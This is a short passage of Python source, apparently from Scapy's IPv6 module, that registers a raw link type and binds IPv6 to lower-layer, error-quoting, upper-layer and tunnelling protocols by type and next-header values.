conf.l2types.register_num2layer(DLT_RAW_ALT, _IPv46)

# IPv6 carried by lower layers.
bind_layers(Ether, IPv6, type=0x86dd)
bind_layers(CookedLinux, IPv6, proto=0x86dd)
bind_layers(GRE, IPv6, proto=0x86dd)
bind_layers(SNAP, IPv6, code=0x86dd)
bind_layers(Loopback, IPv6, type=0x1c)

# Transport layers quoted in ICMPv6 error messages.
bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)

# Upper layers and tunnels selected by the Next Header / Protocol field.
bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)